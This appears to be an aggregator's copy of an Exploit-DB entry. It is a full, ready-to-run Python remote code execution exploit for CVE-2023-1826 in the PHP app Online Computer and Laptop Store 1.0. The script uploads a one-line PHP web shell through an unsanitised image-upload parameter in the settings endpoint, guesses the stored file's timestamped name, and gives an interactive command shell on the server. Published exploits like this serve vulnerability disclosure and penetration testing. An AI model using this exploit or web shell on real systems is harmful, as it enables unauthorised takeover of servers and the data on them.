1

[webapps] Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE)

 1 year ago
source link: https://www.exploit-db.com/exploits/51358
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE)

EDB-ID:

51358

EDB Verified:

Platform:

PHP

Date:

2023-04-10

Vulnerable App:

#!/usr/bin/env python3

# Exploit Title: Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE)
# Date: 09/04/2023
# Exploit Author: Matisse Beckandt (Backendt)
# Vendor Homepage: https://www.sourcecodester.com/php/16397/online-computer-and-laptop-store-using-php-and-mysql-source-code-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ocls.zip
# Version: 1.0
# Tested on: Debian 11.6
# CVE : CVE-2023-1826

# Exploit Description : The application does not sanitize the 'img' parameter when sending data to '/classes/SystemSettings.php?f=update_settings'. An attacker can exploit this issue by uploading a PHP file and accessing it, leading to Remote Code Execution.
import requests
from argparse import ArgumentParser
from uuid import uuid4
from datetime import datetime, timezone

def interactiveShell(fileUrl: str):
    print("Entering pseudo-shell. Type 'exit' to quit")
    while True:
        command = input("\n$ ")
        if command == "exit":
            break

        response = requests.get(f"{fileUrl}?cmd={command}")
        print(response.text)

def uploadFile(url: str, filename: str, content):
    endpoint = f"{url}/classes/SystemSettings.php?f=update_settings"
    file = {"img": (filename, content)}

    response = requests.post(endpoint, files=file)
    return response

def getUploadedFileUrl(url: str, filename: str):
    timeNow = datetime.now(timezone.utc).replace(second=0) # UTC time, rounded to minutes
    epoch = int(timeNow.timestamp()) # Time in milliseconds
    possibleFilename = f"{epoch}_{filename}"
    fileUrl = f"{url}/uploads/{possibleFilename}"
    response = requests.get(fileUrl)
    if response.status_code == 200:
        return fileUrl

def exploit(url: str):
    filename = str(uuid4()) + ".php"
    content = "<?php system($_GET['cmd'])?>"
    response = uploadFile(url, filename, content)

    if response.status_code != 200:
        print(f"[File Upload] Got status code {response.status_code}. Expected 200.")

    uploadedUrl = getUploadedFileUrl(url, filename)
    if uploadedUrl == None:
        print("Error. Could not find the uploaded file.")
        exit(1)
    print(f"Uploaded file is at {uploadedUrl}")

    try:
        interactiveShell(uploadedUrl)
    except KeyboardInterrupt:
        pass
    print("\nQuitting.")

def getWebsiteURL(url: str):
    if not url.startswith("http"):
        url = "http://" + url
    if url.endswith("/"):
        url = url[:-1]
    return url

def main():
    parser = ArgumentParser(description="Exploit for CVE-2023-1826")
    parser.add_argument("url", type=str, help="The url to the application's installation. Example: http://mysite:8080/php-ocls/")
    args = parser.parse_args()

    url = getWebsiteURL(args.url)
    exploit(url)

if __name__ == "__main__":
    main()

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK